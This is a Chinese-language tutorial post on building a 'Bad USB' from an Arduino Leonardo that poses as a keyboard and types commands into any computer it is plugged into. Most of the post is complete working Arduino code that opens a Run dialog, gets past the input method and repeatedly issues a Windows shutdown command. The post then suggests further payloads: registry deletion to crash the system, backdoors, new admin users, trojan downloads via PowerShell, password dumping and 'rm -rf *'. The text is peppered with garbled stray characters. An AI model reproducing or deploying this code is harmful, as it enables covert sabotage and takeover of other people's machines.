嘿嘿嘿垒手,又是一篇猥瑣小文题暖。
簡介
什么是Bad USB?
BadUSB最可怕的一點是惡意代碼存在于U盤的固件中含末,由于PC上的殺毒軟件無法訪問到U盤存放固件的區(qū)域,因此也就意味著殺毒軟件和U盤格式化都無法應對BadUSB進行攻擊即舌。
簡單來說佣盒,就是讓USB設備偽裝成但卻充當鍵盤,被插入的電腦猝不及防會被迅速輸入一定的“指令”顽聂,這個指令會讓該電腦迅速成為肉雞肥惭。
目標
打造一個廉價Bad USB,實現(xiàn)對 終端機紊搪、別人的電腦快速合法化入侵蜜葱。
原料
- Arduino Leonardo
- 普通安卓USB線
舉個??
比如我們要實現(xiàn)一個插入優(yōu)盤就讓對方電腦關機的功能:
用Arduino開發(fā)者工具,選擇
Arduino Leonardo
然后把程序燒錄進去
#include <Keyboard.h>
void setup() {//初始化
Keyboard.begin();//開始鍵盤通訊
delay(5000);//延時
Keyboard.press(KEY_LEFT_GUI);//win鍵
delay(500);
Keyboard.press('r');//r鍵
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用開大寫輸小寫繞過輸入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.println("shutdown -s -t 10");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//結(jié)束鍵盤通訊
}
void loop()//循環(huán)
{
Keyboard.begin();//開始鍵盤通訊
delay(5000);//延時
Keyboard.press(KEY_LEFT_GUI);//win鍵
delay(500);
Keyboard.press('r');//r鍵
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用開大寫輸小寫繞過輸入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.println("shutdown -s -t 10");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//結(jié)束鍵盤通訊
}
已經(jīng)在多臺Windows電腦上試驗成功耀石。
效果
進階
當然牵囤,你可以實現(xiàn)很多功能
- 刪除系統(tǒng)關鍵注冊表使之藍屏
- 留后門
- 新建用戶
- 用戶提權
- 調(diào)用Powershell下載木馬
- 調(diào)用Powershell下載木馬及從內(nèi)存中提取出當前用戶的Windows密碼
- rm -rf *
此外,發(fā)現(xiàn)了一個專門收集Badusb的Github用戶,非常有學習價值揭鳞。
https://github.com/Xyntax/BadUSB-code
參考
http://www.extremetech.com/extreme/191467-badusb-returns-hackers-publish-code-that-could-infect-millions-of-usb-devices
http://www.freebuf.com/sectool/107242.html
http://www.freebuf.com/articles/terminal/53886.html
